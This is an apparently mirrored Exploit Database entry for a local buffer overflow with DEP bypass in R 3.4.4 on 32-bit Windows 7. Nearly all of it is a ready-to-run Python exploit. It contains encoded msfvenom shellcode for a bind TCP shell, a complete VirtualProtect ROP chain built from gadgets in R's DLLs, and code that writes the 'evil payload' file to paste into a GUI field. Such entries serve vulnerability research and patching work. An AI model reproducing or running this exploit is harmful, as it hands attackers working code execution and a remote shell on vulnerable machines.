R 3.4.4 – Local Buffer Overflow (DEP Bypass)

• Exploit Database
• 125 阅读

• 作者： Hashim Jawad
  日期： 2018-05-21
• 类别：

  • local
  平台：

  • windows_x86
• 来源：https://www.exploit-db.com/exploits/44680/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133

  # Exploit Title: R v3.4.4 - Local Buffer Overflow (DEP Bypass) # Exploit Author: Hashim Jawad # Exploit Date: 2018-05-21 # Vendor Homepage: https://www.r-project.org/ # Vulnerable Software: https://www.exploit-db.com/apps/a642a3de7b5c2602180e73f4c04b4fbd-R-3.4.4-win.exe # Tested on OS: Microsoft Windows 7 Enterprise - SP1 (x86) # Steps to reproduce: under GUI preferences, paste payload.txt contents into &apos;Language for menus and messages&apos;   # Credit to bzyo for finding the bug (44516)   #!/usr/bin/python   import struct   #root@kali:~# msfvenom -p windows/shell_bind_tcp -e x86/alpha_mixed -b "\x00\x0a\x0d\x0e" -f python -v shellcode #Payload size: 718 bytes shellcode ="" shellcode += "\x89\xe0\xdb\xd2\xd9\x70\xf4\x5b\x53\x59\x49\x49" shellcode += "\x49\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43" shellcode += "\x43\x43\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30" shellcode += "\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30" shellcode += "\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49" shellcode += "\x69\x6c\x59\x78\x6c\x42\x77\x70\x33\x30\x37\x70" shellcode += "\x31\x70\x6b\x39\x6a\x45\x65\x61\x39\x50\x72\x44" shellcode += "\x6e\x6b\x30\x50\x56\x50\x4e\x6b\x62\x72\x56\x6c" shellcode += "\x6c\x4b\x31\x42\x34\x54\x4c\x4b\x62\x52\x64\x68" shellcode += "\x56\x6f\x68\x37\x70\x4a\x61\x36\x55\x61\x79\x6f" shellcode += "\x6e\x4c\x75\x6c\x73\x51\x51\x6c\x67\x72\x46\x4c" shellcode += "\x57\x50\x4b\x71\x5a\x6f\x36\x6d\x76\x61\x6b\x77" shellcode += "\x7a\x42\x39\x62\x76\x32\x73\x67\x6e\x6b\x36\x32" shellcode += "\x72\x30\x4e\x6b\x73\x7a\x55\x6c\x4e\x6b\x62\x6c" shellcode += "\x42\x31\x72\x58\x38\x63\x51\x58\x35\x51\x6b\x61" shellcode += "\x52\x71\x4e\x6b\x72\x79\x31\x30\x57\x71\x78\x53" shellcode += "\x6c\x4b\x50\x49\x64\x58\x6b\x53\x77\x4a\x70\x49" shellcode += "\x6e\x6b\x37\x44\x4e\x6b\x67\x71\x4b\x66\x45\x61" shellcode += "\x69\x6f\x6c\x6c\x49\x51\x6a\x6f\x46\x6d\x57\x71" shellcode += "\x5a\x67\x56\x58\x39\x70\x42\x55\x4b\x46\x74\x43" shellcode += "\x53\x4d\x59\x68\x35\x6b\x73\x4d\x47\x54\x64\x35" shellcode += "\x5a\x44\x36\x38\x6c\x4b\x56\x38\x57\x54\x76\x61" shellcode += "\x38\x53\x43\x56\x4c\x4b\x64\x4c\x30\x4b\x6c\x4b" shellcode += "\x33\x68\x35\x4c\x57\x71\x59\x43\x6c\x4b\x36\x64" shellcode += "\x6c\x4b\x46\x61\x4e\x30\x6b\x39\x63\x74\x47\x54" shellcode += "\x55\x74\x31\x4b\x43\x6b\x50\x61\x71\x49\x52\x7a" shellcode += "\x62\x71\x6b\x4f\x6b\x50\x61\x4f\x51\x4f\x32\x7a" shellcode += "\x6c\x4b\x66\x72\x5a\x4b\x4c\x4d\x71\x4d\x50\x68" shellcode += "\x76\x53\x45\x62\x65\x50\x75\x50\x31\x78\x73\x47" shellcode += "\x71\x63\x74\x72\x31\x4f\x62\x74\x75\x38\x50\x4c" shellcode += "\x70\x77\x55\x76\x36\x67\x49\x6f\x6b\x65\x6d\x68" shellcode += "\x7a\x30\x73\x31\x55\x50\x65\x50\x36\x49\x78\x44" shellcode += "\x33\x64\x62\x70\x65\x38\x65\x79\x6d\x50\x30\x6b" shellcode += "\x43\x30\x39\x6f\x39\x45\x31\x7a\x56\x68\x70\x59" shellcode += "\x70\x50\x69\x72\x59\x6d\x37\x30\x70\x50\x71\x50" shellcode += "\x50\x50\x33\x58\x39\x7a\x46\x6f\x79\x4f\x6d\x30" shellcode += "\x59\x6f\x69\x45\x7a\x37\x75\x38\x65\x52\x43\x30" shellcode += "\x37\x61\x63\x6c\x4f\x79\x5a\x46\x31\x7a\x34\x50" shellcode += "\x30\x56\x31\x47\x45\x38\x39\x52\x79\x4b\x66\x57" shellcode += "\x42\x47\x59\x6f\x5a\x75\x50\x57\x51\x78\x6c\x77" shellcode += "\x48\x69\x54\x78\x69\x6f\x6b\x4f\x59\x45\x72\x77" shellcode += "\x75\x38\x33\x44\x7a\x4c\x75\x6b\x39\x71\x49\x6f" shellcode += "\x78\x55\x71\x47\x6c\x57\x75\x38\x70\x75\x70\x6e" shellcode += "\x42\x6d\x35\x31\x79\x6f\x38\x55\x72\x48\x70\x63" shellcode += "\x42\x4d\x71\x74\x37\x70\x4f\x79\x79\x73\x71\x47" shellcode += "\x70\x57\x71\x47\x74\x71\x78\x76\x53\x5a\x42\x32" shellcode += "\x62\x79\x52\x76\x6b\x52\x59\x6d\x35\x36\x79\x57" shellcode += "\x52\x64\x35\x74\x57\x4c\x37\x71\x43\x31\x4e\x6d" shellcode += "\x50\x44\x36\x44\x56\x70\x59\x56\x47\x70\x42\x64" shellcode += "\x46\x34\x70\x50\x36\x36\x50\x56\x50\x56\x71\x56" shellcode += "\x42\x76\x30\x4e\x73\x66\x76\x36\x66\x33\x76\x36" shellcode += "\x32\x48\x42\x59\x68\x4c\x55\x6f\x6d\x56\x49\x6f" shellcode += "\x6b\x65\x4b\x39\x59\x70\x72\x6e\x70\x56\x51\x56" shellcode += "\x4b\x4f\x34\x70\x51\x78\x34\x48\x4e\x67\x37\x6d" shellcode += "\x51\x70\x59\x6f\x38\x55\x6d\x6b\x6c\x30\x48\x35" shellcode += "\x69\x32\x72\x76\x62\x48\x4c\x66\x5a\x35\x4f\x4d" shellcode += "\x4d\x4d\x69\x6f\x4a\x75\x65\x6c\x67\x76\x73\x4c" shellcode += "\x47\x7a\x4f\x70\x59\x6b\x4b\x50\x70\x75\x57\x75" shellcode += "\x6f\x4b\x53\x77\x55\x43\x64\x32\x52\x4f\x51\x7a" shellcode += "\x53\x30\x46\x33\x4b\x4f\x4b\x65\x41\x41"   &apos;&apos;&apos; Output generated by mona.py v2.0, rev 582 - Immunity Debugger -------------------------------------------- Register setup for VirtualProtect() : -------------------------------------------- EAX = NOP (0x90909090) ECX = lpOldProtect (ptr to W address) EDX = NewProtect (0x40) EBX = dwSize ESP = lPAddress (automatic) EBP = ReturnTo (ptr to jmp esp) ESI = ptr to VirtualProtect() EDI = ROP NOP (RETN) -------------------------------------------- &apos;&apos;&apos;   rop= struct.pack(&apos;<L&apos;, 0x6cacc7e2)# POP EAX # RETN[R.dll] rop += struct.pack(&apos;<L&apos;, 0x643cb170)# ptr to &VirtualProtect()[IAT Riconv.dll] rop += struct.pack(&apos;<L&apos;, 0x6e7d5435)# MOV EAX,DWORD PTR DS:[EAX] # RETN [utils.dll] rop += struct.pack(&apos;<L&apos;, 0x6ca347fa)# XCHG EAX,ESI # RETN [R.dll] rop += struct.pack(&apos;<L&apos;, 0x6cb7429a)# POP EBP # RETN[R.dll] rop += struct.pack(&apos;<L&apos;, 0x6ca2a9bd)# & jmp esp [R.dll] rop += struct.pack(&apos;<L&apos;, 0x64c45db2)# POP EAX # RETN[methods.dll] rop += struct.pack(&apos;<L&apos;, 0xfffffaff)# value to negate, will become 0x00000501 rop += struct.pack(&apos;<L&apos;, 0x643c361a)# NEG EAX # RETN[Riconv.dll] rop += struct.pack(&apos;<L&apos;, 0x6ca33b8a)# XCHG EAX,EBX # RETN [R.dll] rop += struct.pack(&apos;<L&apos;, 0x6cbef3e4)# POP EAX # RETN[R.dll] rop += struct.pack(&apos;<L&apos;, 0xffffffc0)# Value to negate, will become 0x00000040 rop += struct.pack(&apos;<L&apos;, 0x6ff3a39a)# NEG EAX # RETN[grDevices.dll] rop += struct.pack(&apos;<L&apos;, 0x6ca558be)# XCHG EAX,EDX # RETN [R.dll] rop += struct.pack(&apos;<L&apos;, 0x6cbe90a8)# POP ECX # RETN[R.dll] rop += struct.pack(&apos;<L&apos;, 0x6ff863c1)# &Writable location[grDevices.dll] rop += struct.pack(&apos;<L&apos;, 0x6cbe097f)# POP EDI # RETN[R.dll] rop += struct.pack(&apos;<L&apos;, 0x6375fe5c)# RETN (ROP NOP)[Rgraphapp.dll] rop += struct.pack(&apos;<L&apos;, 0x6c998f58)# POP EAX # RETN[R.dll] rop += struct.pack(&apos;<L&apos;, 0x90909090)# nop rop += struct.pack(&apos;<L&apos;, 0x6fedfa6c)# PUSHAD # RETN [grDevices.dll]   buffer= &apos;\x41&apos; * 292# filler to EIP buffer += struct.pack(&apos;<L&apos;, 0x6fef93c6) # POP ESI # RETN[grDevices.dll] buffer += &apos;\x41&apos; * 4# compensate for pop esi buffer += rop buffer += &apos;\x90&apos; * 50 buffer += shellcode buffer += &apos;\x90&apos; * (5000-292-4-4-len(rop)-50-len(shellcode))   try: f=open(&apos;payload.txt&apos;,&apos;w&apos;) print &apos;[+] Creating %s bytes evil payload..&apos; %len(buffer) f.write(buffer) f.close() print &apos;[+] File created!&apos; except Exception as e: print e